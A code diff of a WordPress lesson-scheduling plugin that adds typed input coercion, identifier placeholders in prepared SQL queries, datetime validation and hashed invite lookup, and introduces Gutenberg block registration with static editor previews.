return '';
}
/**
* Build the registration URL for a raw invite token.
*/
private function registrationLink( string $rawToken ): string {
$pageId = Val::int( get_option( self::OPTION_PAGE, 0 ) );
$linkBase = $pageId > 0 ? (string) get_permalink( $pageId ) : '';
return add_query_arg( 'us_invite', rawurlencode( $rawToken ), '' !== $linkBase ? $linkBase : home_url( '/' ) );
}
}
src/Auth/RegistrationPage.php
+12 -9
View File
@@ -8,6 +8,7 @@ use Unsupervised\Schedular\Policy\Policy;
use Unsupervised\Schedular\Policy\PolicyAcceptance;
use Unsupervised\Schedular\Policy\PolicyRepository;
use Unsupervised\Schedular\Policy\PolicyVersionRepository;
use Unsupervised\Schedular\Val;
class RegistrationPage {
@@ -21,7 +22,7 @@ class RegistrationPage {
/**
* Renders the student registration shortcode output.
*
* @param array<string, string> $atts Shortcode attributes (unused — reserved for future options).
* @param array<string> $atts Shortcode attributes (unused — reserved for future options).
*/
public function render( array $atts ): string { // phpcs:ignore Generic.CodeAnalysis.UnusedFunctionParameter.Found
if ( is_user_logged_in() ) {
@@ -29,8 +30,9 @@ class RegistrationPage {
}
// phpcs:ignore WordPress.Security.NonceVerification.Recommended -- token identifies the invite; the form submit is nonce-checked below.
$token = sanitize_text_field( wp_unslash( $_REQUEST['us_invite'] ?? '' ) );
$invite = '' !== $token ? $this->invites->findByToken( $token ) : null;
$token = sanitize_text_field( Val::string( wp_unslash( $_REQUEST['us_invite'] ?? '' ) ) );
// Only the token's hash is stored, so hash the submitted token for lookup.
$invite = '' !== $token ? $this->invites->findByToken( Invite::hashToken( $token ) ) : null;
$error = '';
$success = false;
@@ -63,12 +65,12 @@ class RegistrationPage {
}
// phpcs:ignore WordPress.Security.NonceVerification.Recommended -- read-only token used only to build the redirect target.
$token = sanitize_text_field( wp_unslash( $_GET['us_invite'] ?? '' ) );
$token = sanitize_text_field( Val::string( wp_unslash( $_GET['us_invite'] ?? '' ) ) );
if ( '' === $token ) {
return;
}
$pageId = (int) get_option( RegistrationController::OPTION_PAGE, 0 );
$pageId = Val::int( get_option( RegistrationController::OPTION_PAGE, 0 ) );
if ( $pageId <= 0 || is_page( $pageId ) ) {
return;
}
@@ -89,15 +91,16 @@ class RegistrationPage {
// The submit nonce is verified by the caller (render) before this runs.
// phpcs:disable WordPress.Security.NonceVerification.Missing
// phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized -- passwords must not be sanitized.
$password = (string) wp_unslash( $_POST['password'] ?? '' );
$displayName = sanitize_text_field( wp_unslash( $_POST['display_name'] ?? '' ) );
$password = Val::string( wp_unslash( $_POST['password'] ?? '' ) );
$displayName = sanitize_text_field( Val::string( wp_unslash( $_POST['display_name'] ?? '' ) ) );
if ( strlen( $password ) < 8 ) {
return esc_html__( 'Please choose a password of at least 8 characters.', 'unsupervised-schedular' );
}
$policyForms = $this->signupPolicies();
$accepted = array_map( 'absint', (array) ( $_POST['accept'] ?? [] ) );
// phpcs:ignore WordPress.Security.ValidatedSanitizedInput.MissingUnslash, WordPress.Security.ValidatedSanitizedInput.InputNotSanitized -- each element is coerced to a positive int in the array_map callback; slashes cannot survive integer coercion.
$accepted = array_map( static fn( mixed $v ): int => absint( Val::int( $v ) ), (array) ( $_POST['accept'] ?? [] ) );
// phpcs:enable WordPress.Security.NonceVerification.Missing
foreach ( $policyForms as $form ) {
@@ -140,7 +143,7 @@ class RegistrationPage {
*/
private function recordAcceptances( array $policyForms, int $userId ): void {
// phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized, WordPress.Security.ValidatedSanitizedInput.MissingUnslash -- IP is stored verbatim for audit.
$ip = sanitize_text_field( wp_unslash( $_SERVER['REMOTE_ADDR'] ?? '' ) );
$ip = sanitize_text_field( Val::string( wp_unslash( $_SERVER['REMOTE_ADDR'] ?? '' ) ) );
foreach ( $policyForms as $form ) {
$this->acceptances->insert(
src/Auth/StudentController.php
+7 -3
View File
@@ -11,6 +11,7 @@ use Unsupervised\Schedular\GroupClass\EnrollmentRepository;
use Unsupervised\Schedular\Offering\OfferingRepository;
use Unsupervised\Schedular\Payment\BillingMethodResolver;
use Unsupervised\Schedular\Payment\Payment;
use Unsupervised\Schedular\Val;
class StudentController {
@@ -28,7 +29,7 @@ class StudentController {
}
// phpcs:ignore WordPress.Security.NonceVerification.Recommended -- read-only student selector.
$studentId = absint( $_GET['student_id'] ?? 0 );
$studentId = absint( Val::int( $_GET['student_id'] ?? 0 ) );
$student = $studentId > 0 ? get_userdata( $studentId ) : false;
if ( $student && in_array( RoleManager::STUDENT, (array) $student->roles, true ) ) {
@@ -45,12 +46,15 @@ class StudentController {
'upcoming' => $this->bookings->countUpcomingForStudent( (int) $user->ID ),
'enrolments' => $this->enrollments->countActiveForStudent( (int) $user->ID ),
],
array_filter(
get_users(
[
'role' => RoleManager::STUDENT,
'orderby' => 'display_name',
'order' => 'ASC',
]
),
static fn( mixed $user ): bool => $user instanceof \WP_User
)
);
@@ -63,7 +67,7 @@ class StudentController {
if ( $canBilling && isset( $_POST['usc_action'] ) && check_admin_referer( 'usc_student_billing' ) ) {
// phpcs:ignore WordPress.Security.NonceVerification.Missing -- nonce checked above.
$method = sanitize_key( wp_unslash( $_POST['payment_method'] ?? '' ) );
$method = sanitize_key( Val::string( wp_unslash( $_POST['payment_method'] ?? '' ) ) );
if ( in_array( $method, Payment::VALID_METHODS, true ) ) {
update_user_meta( (int) $student->ID, BillingMethodResolver::META_METHOD, $method );
} else {
@@ -71,7 +75,7 @@ class StudentController {
}
}
$billingOverride = (string) get_user_meta( (int) $student->ID, BillingMethodResolver::META_METHOD, true );
$billingOverride = Val::string( get_user_meta( (int) $student->ID, BillingMethodResolver::META_METHOD, true ) );
$billingDefault = $this->resolver->defaultMethod();
$now = current_time( 'mysql' );
src/Auth/StudentSchedule.php
+7 -5
View File
@@ -3,6 +3,8 @@ declare(strict_types=1);
namespace Unsupervised\Schedular\Auth;
use Unsupervised\Schedular\Val;
/**
* Pure helper for splitting a student's dated rows into upcoming and past.
*/
@@ -21,7 +23,7 @@ class StudentSchedule {
$past = [];
foreach ( $rows as $row ) {
$start = (string) ( $row['start_dt'] ?? '' );
$start = Val::string( $row['start_dt'] ?? '' );
if ( '' !== $start && $start >= $now ) {
$upcoming[] = $row;
} else {
@@ -29,12 +31,12 @@ class StudentSchedule {
}
}
usort( $upcoming, static fn( array $a, array $b ): int => strcmp( (string) ( $a['start_dt'] ?? '' ), (string) ( $b['start_dt'] ?? '' ) ) );
usort( $past, static fn( array $a, array $b ): int => strcmp( (string) ( $b['start_dt'] ?? '' ), (string) ( $a['start_dt'] ?? '' ) ) );
usort( $upcoming, static fn( array $a, array $b ): int => strcmp( Val::string( $a['start_dt'] ?? '' ), Val::string( $b['start_dt'] ?? '' ) ) );
usort( $past, static fn( array $a, array $b ): int => strcmp( Val::string( $b['start_dt'] ?? '' ), Val::string( $a['start_dt'] ?? '' ) ) );
return [
'upcoming' => array_values( $upcoming ),
'past' => array_values( $past ),
'upcoming' => $upcoming,
'past' => $past,
];
}
}
src/Availability/AvailabilityController.php
+10 -9
View File
@@ -6,6 +6,7 @@ namespace Unsupervised\Schedular\Availability;
use Unsupervised\Schedular\Auth\RoleManager;
use Unsupervised\Schedular\Offering\Offering;
use Unsupervised\Schedular\Offering\OfferingRepository;
use Unsupervised\Schedular\Val;
class AvailabilityController {
@@ -34,14 +35,14 @@ class AvailabilityController {
private function handleFormAction( int $instructorId ): void {
// Nonce is verified by the caller (renderPage) before this method runs.
// phpcs:disable WordPress.Security.NonceVerification.Missing
$action = sanitize_key( wp_unslash( $_POST['usc_action'] ?? '' ) );
$action = sanitize_key( Val::string( wp_unslash( $_POST['usc_action'] ?? '' ) ) );
if ( 'add' === $action ) {
$this->addSlot( $instructorId );
}
if ( 'delete' === $action ) {
$slotId = absint( $_POST['slot_id'] ?? 0 );
$slotId = absint( Val::int( $_POST['slot_id'] ?? 0 ) );
if ( $slotId > 0 ) {
$slot = $this->repository->findById( $slotId );
if ( $slot && $slot->instructorId === $instructorId ) {
@@ -54,15 +55,15 @@ class AvailabilityController {
private function addSlot( int $instructorId ): void {
// phpcs:disable WordPress.Security.NonceVerification.Missing
$startDt = sanitize_text_field( wp_unslash( $_POST['start_dt'] ?? '' ) );
$endDt = sanitize_text_field( wp_unslash( $_POST['end_dt'] ?? '' ) );
$startDt = AvailabilitySlot::normalizeDateTime( sanitize_text_field( Val::string( wp_unslash( $_POST['start_dt'] ?? '' ) ) ) );
$endDt = AvailabilitySlot::normalizeDateTime( sanitize_text_field( Val::string( wp_unslash( $_POST['end_dt'] ?? '' ) ) ) );
if ( '' === $startDt || '' === $endDt ) {
if ( null === $startDt || null === $endDt || $endDt <= $startDt ) {
return;
}
$offeringId = absint( $_POST['offering_id'] ?? 0 );
$duration = absint( $_POST['duration_minutes'] ?? 0 );
$offeringId = absint( Val::int( $_POST['offering_id'] ?? 0 ) );
$duration = absint( Val::int( $_POST['duration_minutes'] ?? 0 ) );
$slot = new AvailabilitySlot(
instructorId: $instructorId,
@@ -72,8 +73,8 @@ class AvailabilityController {
offeringId: $offeringId > 0 ? $offeringId : null,
);
if ( 'weekly' === sanitize_key( wp_unslash( $_POST['recurrence'] ?? 'single' ) ) ) {
$this->repository->createWeeklySeries( $slot, absint( $_POST['weeks'] ?? 1 ) );
if ( 'weekly' === sanitize_key( Val::string( wp_unslash( $_POST['recurrence'] ?? 'single' ) ) ) ) {
$this->repository->createWeeklySeries( $slot, absint( Val::int( $_POST['weeks'] ?? 1 ) ) );
return;
}
src/Availability/AvailabilityEndpoint.php
+24 -11
View File
@@ -5,6 +5,7 @@ namespace Unsupervised\Schedular\Availability;
use Unsupervised\Schedular\Auth\RoleManager;
use Unsupervised\Schedular\Offering\OfferingRepository;
use Unsupervised\Schedular\Val;
class AvailabilityEndpoint {
@@ -13,6 +14,11 @@ class AvailabilityEndpoint {
private OfferingRepository $offerings,
) {}
/**
* Registers this endpoint's REST routes.
*
* @param non-falsy-string $route_namespace REST namespace the routes are registered under (e.g. `us-scheduler/v1`).
*/
public function registerRoutes( string $route_namespace ): void {
register_rest_route(
$route_namespace,
@@ -96,11 +102,11 @@ class AvailabilityEndpoint {
public function index( \WP_REST_Request $request ): \WP_REST_Response {
$slots = $this->repository->findAvailable(
(int) $request->get_param( 'instructor_id' ),
(int) $request->get_param( 'offering_id' ),
(int) $request->get_param( 'duration_minutes' ),
(string) $request->get_param( 'from' ),
(string) $request->get_param( 'to' ),
Val::int( $request->get_param( 'instructor_id' ) ),
Val::int( $request->get_param( 'offering_id' ) ),
Val::int( $request->get_param( 'duration_minutes' ) ),
Val::string( $request->get_param( 'from' ) ),
Val::string( $request->get_param( 'to' ) ),
);
return new \WP_REST_Response( array_map( fn( AvailabilitySlot $s ) => $s->toArray(), $slots ), 200 );
@@ -108,8 +114,8 @@ class AvailabilityEndpoint {
public function create( \WP_REST_Request $request ): \WP_REST_Response|\WP_Error {
$instructorId = get_current_user_id();
$offeringId = absint( $request->get_param( 'offering_id' ) );
$duration = absint( $request->get_param( 'duration_minutes' ) );
$offeringId = absint( Val::int( $request->get_param( 'offering_id' ) ) );
$duration = absint( Val::int( $request->get_param( 'duration_minutes' ) ) );
// A slot may only be tied to an offering the instructor owns, so it can
// never inherit another instructor's price or payment routing at booking.
@@ -120,16 +126,23 @@ class AvailabilityEndpoint {
}
}
$startDt = AvailabilitySlot::normalizeDateTime( Val::string( $request->get_param( 'start_dt' ) ) );
$endDt = AvailabilitySlot::normalizeDateTime( Val::string( $request->get_param( 'end_dt' ) ) );
if ( null === $startDt || null === $endDt || $endDt <= $startDt ) {
return new \WP_Error( 'invalid_datetime', __( 'Provide a valid start and end, with the end after the start.', 'unsupervised-schedular' ), [ 'status' => 400 ] );
}
$slot = new AvailabilitySlot(
instructorId: $instructorId,
startDt: (string) $request->get_param( 'start_dt' ),
endDt: (string) $request->get_param( 'end_dt' ),
startDt: $startDt,
endDt: $endDt,
durationMinutes: $duration > 0 ? $duration : 60,
offeringId: $offeringId > 0 ? $offeringId : null,
);
if ( 'weekly' === $request->get_param( 'recurrence' ) ) {
$ids = $this->repository->createWeeklySeries( $slot, absint( $request->get_param( 'weeks' ) ) );
$ids = $this->repository->createWeeklySeries( $slot, absint( Val::int( $request->get_param( 'weeks' ) ) ) );
return new \WP_REST_Response( [ 'ids' => $ids ], 201 );
}
@@ -140,7 +153,7 @@ class AvailabilityEndpoint {
}
public function delete( \WP_REST_Request $request ): \WP_REST_Response|\WP_Error {
$id = absint( $request->get_param( 'id' ) );
$id = absint( Val::int( $request->get_param( 'id' ) ) );
$slot = $this->repository->findById( $id );
if ( null === $slot ) {
src/Availability/AvailabilityRepository.php
+9 -7
View File
@@ -116,11 +116,11 @@ class AvailabilityRepository {
}
$whereClause = implode( ' AND ', $where );
$sql = "SELECT * FROM {$this->table} WHERE {$whereClause} ORDER BY start_dt ASC";
$sql = "SELECT * FROM %i WHERE {$whereClause} ORDER BY start_dt ASC";
$rows = $params
? $this->db->get_results( $this->db->prepare( $sql, $params ) )
: $this->db->get_results( $sql );
$rows = $this->db->get_results(
$this->db->prepare( $sql, array_merge( [ $this->table ], $params ) )
);
return array_map( AvailabilitySlot::fromRow( ... ), $rows ?? [] );
}
@@ -133,7 +133,8 @@ class AvailabilityRepository {
public function findByInstructor( int $instructorId ): array {
$rows = $this->db->get_results(
$this->db->prepare(
"SELECT * FROM {$this->table} WHERE instructor_id = %d ORDER BY start_dt ASC",
'SELECT * FROM %i WHERE instructor_id = %d ORDER BY start_dt ASC',
$this->table,
$instructorId
)
);
@@ -149,7 +150,8 @@ class AvailabilityRepository {
public function findUnbookedInGroup( int $recurrenceGroup ): array {
$rows = $this->db->get_results(
$this->db->prepare(
"SELECT * FROM {$this->table} WHERE recurrence_group = %d AND is_booked = 0 ORDER BY start_dt ASC",
'SELECT * FROM %i WHERE recurrence_group = %d AND is_booked = 0 ORDER BY start_dt ASC',
$this->table,
$recurrenceGroup
)
);
@@ -159,7 +161,7 @@ class AvailabilityRepository {
public function findById( int $id ): ?AvailabilitySlot {
$row = $this->db->get_row(
$this->db->prepare( "SELECT * FROM {$this->table} WHERE id = %d", $id )
$this->db->prepare( 'SELECT * FROM %i WHERE id = %d', $this->table, $id )
);
return $row ? AvailabilitySlot::fromRow( $row ) : null;
src/Availability/AvailabilitySlot.php
+30 -9
View File
@@ -3,6 +3,8 @@ declare(strict_types=1);
namespace Unsupervised\Schedular\Availability;
use Unsupervised\Schedular\Val;
class AvailabilitySlot {
public function __construct(
@@ -16,16 +18,35 @@ class AvailabilitySlot {
public readonly ?int $id = null,
) {}
public static function fromRow( object $row ): self {
/**
* Normalise a submitted slot datetime to canonical `Y-m-d H:i:s`, or null when
* it is not a real datetime. Accepts the HTML `datetime-local` form
* (`Y-m-d\TH:i`, optionally with seconds) and the canonical form (optionally
* without seconds). Anything else — including strings PHP would "helpfully"
* coerce — is rejected so garbage never reaches the DATETIME column or throws
* inside the weekly-series date arithmetic.
*/
public static function normalizeDateTime( string $value ): ?string {
foreach ( [ 'Y-m-d H:i:s', 'Y-m-d H:i', 'Y-m-d\TH:i:s', 'Y-m-d\TH:i' ] as $format ) {
$dt = \DateTimeImmutable::createFromFormat( '!' . $format, $value );
if ( false !== $dt && $dt->format( $format ) === $value ) {
return $dt->format( 'Y-m-d H:i:s' );
}
}
return null;
}
public static function fromRow( \stdClass $row ): self {
return new self(
instructorId: (int) $row->instructor_id,
startDt: $row->start_dt,
endDt: $row->end_dt,
durationMinutes: (int) $row->duration_minutes,
offeringId: null !== $row->offering_id ? (int) $row->offering_id : null,
isBooked: (bool) $row->is_booked,
recurrenceGroup: null !== $row->recurrence_group ? (int) $row->recurrence_group : null,
id: (int) $row->id,
instructorId: Val::int( $row->instructor_id ),
startDt: Val::string( $row->start_dt ),
endDt: Val::string( $row->end_dt ),
durationMinutes: Val::int( $row->duration_minutes ),
offeringId: Val::intOrNull( $row->offering_id ),
isBooked: Val::bool( $row->is_booked ),
recurrenceGroup: Val::intOrNull( $row->recurrence_group ),
id: Val::int( $row->id ),
);
}
src/BlockPreview.php
+114
View File
@@ -0,0 +1,114 @@
<?php
declare(strict_types=1);
namespace Unsupervised\Schedular;
/**
* Static, script-free markup for the editor previews of the front-end blocks.
*
* The booking and group-class pages are populated by JavaScript on the live
* site, and the registration page requires a valid invite token — none of
* which exist inside the block editor. These previews reproduce the same
* wrapper elements and CSS classes the live pages use, filled with
* representative placeholder content, so themes can be styled against
* realistic markup without firing REST calls, redirects, or Stripe.js.
*/
class BlockPreview {
public static function booking(): string {
$days = [
[
'label' => __( 'Monday', 'unsupervised-schedular' ),
'slots' => [
[ '16:0016:30', 30 ],
[ '16:3017:00', 30 ],
],
],
[
'label' => __( 'Wednesday', 'unsupervised-schedular' ),
'slots' => [
[ '17:0017:45', 45 ],
],
],
];
$dayHtml = '';
foreach ( $days as $day ) {
$slotHtml = '';
foreach ( $day['slots'] as $slot ) {
$slotHtml .= sprintf(
'<div class="us-slot"><span>%s (%d min)</span><button type="button" class="us-book-btn" disabled>%s</button></div>',
esc_html( $slot[0] ),
(int) $slot[1],
esc_html__( 'Book', 'unsupervised-schedular' )
);
}
$dayHtml .= sprintf(
'<div class="us-day"><h3 class="us-day-heading">%s</h3>%s</div>',
esc_html( $day['label'] ),
$slotHtml
);
}
return sprintf(
'<div id="us-booking-app">%s<div id="us-slot-list">%s</div></div>',
self::note( __( 'Editor preview — students see live availability on the published page.', 'unsupervised-schedular' ) ),
$dayHtml
);
}
public static function groupClasses(): string {
return sprintf(
'<div id="us-group-app">%s<div id="us-group-list"><div class="us-class"><h3>%s</h3><p>%s</p><p>%s</p><p>25.00 CAD</p><button type="button" class="us-enrol-btn" disabled>%s</button></div></div></div>',
self::note( __( 'Editor preview — students see live group classes on the published page.', 'unsupervised-schedular' ) ),
esc_html__( 'Beginner Group Class', 'unsupervised-schedular' ),
esc_html__( 'Saturdays 10:0011:00', 'unsupervised-schedular' ),
esc_html__( 'A sample class shown so the page can be styled.', 'unsupervised-schedular' ),
esc_html__( 'Enrol', 'unsupervised-schedular' )
);
}
/**
* The live login form renders fine without any request state, so the
* preview includes the real template (the editing user is logged in, which
* would otherwise short-circuit to an "already logged in" message).
*/
public static function login(): string {
$error = '';
ob_start();
include USC_PLUGIN_DIR . 'templates/frontend/login-page.php';
return self::note( __( 'Editor preview — logged-in visitors are offered a link to the booking page instead.', 'unsupervised-schedular' ) ) . (string) ob_get_clean();
}
public static function registration(): string {
$fields = sprintf(
'<p><label for="us-reg-email">%s</label><input type="email" id="us-reg-email" value="student@example.com" readonly></p>',
esc_html__( 'Email', 'unsupervised-schedular' )
);
$fields .= sprintf(
'<p><label for="us-reg-name">%s</label><input type="text" id="us-reg-name"></p>',
esc_html__( 'Your name', 'unsupervised-schedular' )
);
$fields .= sprintf(
'<p><label for="us-reg-pass">%s</label><input type="password" id="us-reg-pass"></p>',
esc_html__( 'Password', 'unsupervised-schedular' )
);
$fields .= sprintf(
'<p><input type="submit" value="%s" disabled></p>',
esc_attr__( 'Create Account', 'unsupervised-schedular' )
);
return sprintf(
'<div class="us-register-form">%s<form>%s</form></div>',
self::note( __( 'Editor preview — the live form requires a valid invite link and lists signup policies.', 'unsupervised-schedular' ) ),
$fields
);
}
private static function note( string $text ): string {
return '<p class="us-editor-note">' . esc_html( $text ) . '</p>';
}
}
src/BlockRegistrar.php
+126
View File
@@ -0,0 +1,126 @@
<?php
declare(strict_types=1);
namespace Unsupervised\Schedular;
use Unsupervised\Schedular\Auth\LoginPage;
use Unsupervised\Schedular\Auth\RegistrationPage;
use Unsupervised\Schedular\Booking\BookingPage;
use Unsupervised\Schedular\GroupClass\GroupClassPage;
/**
* Registers Gutenberg dynamic-block wrappers for the front-end shortcodes so
* the pages can be previewed and styled inside the block editor.
*
* On the front end each block delegates to the same page object its shortcode
* uses, so output is identical either way. Inside the editor (the
* block-renderer REST preview used by wp.serverSideRender) a static preview
* from BlockPreview is rendered instead — same markup and CSS classes, no
* live REST calls, redirects, or Stripe.js.
*/
class BlockRegistrar {
public const SCRIPT_HANDLE = 'us-scheduler-blocks';
public const STYLE_HANDLE = 'us-scheduler';
public function __construct(
private BookingPage $bookingPage,
private LoginPage $loginPage,
private RegistrationPage $registrationPage,
private GroupClassPage $groupClassPage,
) {}
public function register(): void {
add_action( 'init', [ $this, 'registerBlocks' ] );
}
public function registerBlocks(): void {
// The editor script registers the client side of each block (title,
// icon, shortcode transform) and previews it via wp.serverSideRender.
wp_register_script(
self::SCRIPT_HANDLE,
USC_PLUGIN_URL . 'assets/js/blocks.js',
[ 'wp-blocks', 'wp-element', 'wp-block-editor', 'wp-server-side-render', 'wp-i18n' ],
USC_VERSION,
true
);
// The front-end stylesheet doubles as the block style so editor
// previews look like the published page. ShortcodeRegistrar registers
// the same handle on the front end, hence the guard.
if ( ! wp_style_is( self::STYLE_HANDLE, 'registered' ) ) {
wp_register_style( self::STYLE_HANDLE, USC_PLUGIN_URL . 'assets/css/frontend.css', [], USC_VERSION );
}
foreach ( $this->blocks() as $name => $renderCallback ) {
register_block_type(
$name,
[
'api_version' => '3',
'editor_script' => self::SCRIPT_HANDLE,
'style' => self::STYLE_HANDLE,
'render_callback' => $renderCallback,
]
);
}
}
/**
* Block names mapped to their render callbacks.
*
* @return array<string, callable(array<string, mixed>): string>
*/
private function blocks(): array {
return [
'us-scheduler/booking' => [ $this, 'renderBooking' ],
'us-scheduler/student-login' => [ $this, 'renderLogin' ],
'us-scheduler/student-register' => [ $this, 'renderRegistration' ],
'us-scheduler/group-classes' => [ $this, 'renderGroupClasses' ],
];
}
/**
* Renders the booking block.
*
* @param array<string, mixed> $attributes Block attributes (unused — the blocks have none yet).
*/
public function renderBooking( array $attributes = [] ): string { // phpcs:ignore Generic.CodeAnalysis.UnusedFunctionParameter.Found
return $this->isEditorPreview() ? BlockPreview::booking() : $this->bookingPage->render( [] );
}
/**
* Renders the student-login block.
*
* @param array<string, mixed> $attributes Block attributes (unused — the blocks have none yet).
*/
public function renderLogin( array $attributes = [] ): string { // phpcs:ignore Generic.CodeAnalysis.UnusedFunctionParameter.Found
return $this->isEditorPreview() ? BlockPreview::login() : $this->loginPage->render( [] );
}
/**
* Renders the student-registration block.
*
* @param array<string, mixed> $attributes Block attributes (unused — the blocks have none yet).
*/
public function renderRegistration( array $attributes = [] ): string { // phpcs:ignore Generic.CodeAnalysis.UnusedFunctionParameter.Found
return $this->isEditorPreview() ? BlockPreview::registration() : $this->registrationPage->render( [] );
}
/**
* Renders the group-classes block.
*
* @param array<string, mixed> $attributes Block attributes (unused — the blocks have none yet).
*/
public function renderGroupClasses( array $attributes = [] ): string { // phpcs:ignore Generic.CodeAnalysis.UnusedFunctionParameter.Found
return $this->isEditorPreview() ? BlockPreview::groupClasses() : $this->groupClassPage->render( [] );
}
/**
* Whether this render is the editor's block-renderer REST preview rather
* than a real front-end page render. Front-end template rendering never
* happens inside a REST request, so REST_REQUEST is a reliable signal.
*/
protected function isEditorPreview(): bool {
return defined( 'REST_REQUEST' ) && (bool) constant( 'REST_REQUEST' );
}
}
src/Booking/BookingEndpoint.php
+14 -8
View File
@@ -10,6 +10,7 @@ use Unsupervised\Schedular\Payment\Payment;
use Unsupervised\Schedular\Payment\PaymentService;
use Unsupervised\Schedular\Policy\PolicyAcceptance;
use Unsupervised\Schedular\Registration\RegistrationGate;
use Unsupervised\Schedular\Val;
class BookingEndpoint {
@@ -27,6 +28,11 @@ class BookingEndpoint {
private PaymentService $payments,
) {}
/**
* Registers this endpoint's REST routes.
*
* @param non-falsy-string $route_namespace REST namespace the routes are registered under (e.g. `us-scheduler/v1`).
*/
public function registerRoutes( string $route_namespace ): void {
register_rest_route(
$route_namespace,
@@ -103,7 +109,7 @@ class BookingEndpoint {
}
public function book( \WP_REST_Request $request ): \WP_REST_Response|\WP_Error {
$slotId = (int) $request->get_param( 'slot_id' );
$slotId = Val::int( $request->get_param( 'slot_id' ) );
$slot = $this->availability->findById( $slotId );
if ( null === $slot ) {
@@ -120,7 +126,7 @@ class BookingEndpoint {
// used must belong to the slot's instructor. This prevents substituting a
// cheaper/free offering to dodge payment, or another instructor's offering
// to misroute it.
$requestedOfferingId = absint( $request->get_param( 'offering_id' ) );
$requestedOfferingId = absint( Val::int( $request->get_param( 'offering_id' ) ) );
$slotOfferingId = (int) ( $slot->offeringId ?? 0 );
if ( $slotOfferingId > 0 ) {
@@ -142,7 +148,7 @@ class BookingEndpoint {
}
$answers = $this->answers( $request );
$acceptedVersionIds = array_map( 'absint', (array) $request->get_param( 'accepted_policy_version_ids' ) );
$acceptedVersionIds = array_values( array_map( static fn( mixed $v ): int => absint( Val::int( $v ) ), (array) $request->get_param( 'accepted_policy_version_ids' ) ) );
$gateError = $this->gate->validate( $offeringId, $answers, $acceptedVersionIds );
if ( $gateError instanceof \WP_Error ) {
@@ -150,7 +156,7 @@ class BookingEndpoint {
}
$studentId = get_current_user_id();
$notes = (string) $request->get_param( 'notes' );
$notes = Val::string( $request->get_param( 'notes' ) );
$recurrence = Lesson::RECURRENCE_WEEKLY === $request->get_param( 'recurrence' )
? Lesson::RECURRENCE_WEEKLY
: Lesson::RECURRENCE_SINGLE;
@@ -212,7 +218,7 @@ class BookingEndpoint {
private function answers( \WP_REST_Request $request ): array {
$out = [];
foreach ( (array) $request->get_param( 'answers' ) as $questionId => $value ) {
$out[ (int) $questionId ] = sanitize_text_field( (string) $value );
$out[ (int) $questionId ] = sanitize_text_field( Val::string( $value ) );
}
return $out;
@@ -220,13 +226,13 @@ class BookingEndpoint {
private function clientIp(): ?string {
// phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized, WordPress.Security.ValidatedSanitizedInput.MissingUnslash -- IP stored verbatim for audit.
$ip = sanitize_text_field( wp_unslash( $_SERVER['REMOTE_ADDR'] ?? '' ) );
$ip = sanitize_text_field( Val::string( wp_unslash( $_SERVER['REMOTE_ADDR'] ?? '' ) ) );
return '' !== $ip ? $ip : null;
}
public function updateStatus( \WP_REST_Request $request ): \WP_REST_Response|\WP_Error {
$id = absint( $request->get_param( 'id' ) );
$id = absint( Val::int( $request->get_param( 'id' ) ) );
$lesson = $this->bookings->findById( $id );
if ( null === $lesson ) {
@@ -237,7 +243,7 @@ class BookingEndpoint {
return new \WP_Error( 'forbidden', __( 'You cannot update this booking.', 'unsupervised-schedular' ), [ 'status' => 403 ] );
}
$this->bookings->updateStatus( $id, (string) $request->get_param( 'status' ) );
$this->bookings->updateStatus( $id, Val::string( $request->get_param( 'status' ) ) );
return new \WP_REST_Response(
[
src/Booking/BookingPage.php
+4 -2
View File
@@ -10,14 +10,16 @@ class BookingPage {
/**
* Renders the booking shortcode output.
*
* @param array<string, string> $atts Shortcode attributes (unused — reserved for future options).
* @param array<string> $atts Shortcode attributes (unused — reserved for future options).
*/
public function render( array $atts ): string { // phpcs:ignore Generic.CodeAnalysis.UnusedFunctionParameter.Found
if ( ! is_user_logged_in() ) {
$permalink = get_permalink();
return sprintf(
'<p>%s <a href="%s">%s</a>.</p>',
esc_html__( 'Please', 'unsupervised-schedular' ),
esc_url( wp_login_url( get_permalink() ) ),
esc_url( wp_login_url( false === $permalink ? '' : $permalink ) ),
esc_html__( 'log in to book a lesson', 'unsupervised-schedular' )
);
}
src/Booking/BookingRepository.php
+18 -11
View File
@@ -80,7 +80,7 @@ class BookingRepository {
public function findById( int $id ): ?Lesson {
$row = $this->db->get_row(
$this->db->prepare( "SELECT * FROM {$this->table} WHERE id = %d", $id )
$this->db->prepare( 'SELECT * FROM %i WHERE id = %d', $this->table, $id )
);
return $row ? Lesson::fromRow( $row ) : null;
@@ -96,12 +96,14 @@ class BookingRepository {
$rows = $this->db->get_results(
$this->db->prepare(
"SELECT l.* FROM {$this->table} l
JOIN {$avTable} a ON a.id = l.slot_id
'SELECT l.* FROM %i l
JOIN %i a ON a.id = l.slot_id
WHERE l.instructor_id = %d
AND l.status != %s
AND a.start_dt >= %s
ORDER BY a.start_dt ASC",
ORDER BY a.start_dt ASC',
$this->table,
$avTable,
$instructorId,
Lesson::STATUS_CANCELLED,
current_time( 'mysql' )
@@ -119,11 +121,13 @@ class BookingRepository {
return (int) $this->db->get_var(
$this->db->prepare(
"SELECT COUNT(*) FROM {$this->table} l
JOIN {$avTable} a ON a.id = l.slot_id
'SELECT COUNT(*) FROM %i l
JOIN %i a ON a.id = l.slot_id
WHERE l.student_id = %d
AND l.status != %s
AND a.start_dt >= %s",
AND a.start_dt >= %s',
$this->table,
$avTable,
$studentId,
Lesson::STATUS_CANCELLED,
current_time( 'mysql' )
@@ -139,7 +143,8 @@ class BookingRepository {
public function findByStudent( int $studentId ): array {
$rows = $this->db->get_results(
$this->db->prepare(
"SELECT * FROM {$this->table} WHERE student_id = %d ORDER BY created_at DESC",
'SELECT * FROM %i WHERE student_id = %d ORDER BY created_at DESC',
$this->table,
$studentId
)
);
@@ -157,11 +162,13 @@ class BookingRepository {
$rows = $this->db->get_results(
$this->db->prepare(
"SELECT l.* FROM {$this->table} l
JOIN {$avTable} a ON a.id = l.slot_id
'SELECT l.* FROM %i l
JOIN %i a ON a.id = l.slot_id
WHERE l.status != %s
AND a.start_dt >= %s
ORDER BY a.start_dt ASC",
ORDER BY a.start_dt ASC',
$this->table,
$avTable,
Lesson::STATUS_CANCELLED,
current_time( 'mysql' )
)
src/Booking/Lesson.php
+13 -11
View File
@@ -3,6 +3,8 @@ declare(strict_types=1);
namespace Unsupervised\Schedular\Booking;
use Unsupervised\Schedular\Val;
class Lesson {
public const STATUS_PENDING = 'pending';
@@ -39,18 +41,18 @@ class Lesson {
public readonly ?int $id = null,
) {}
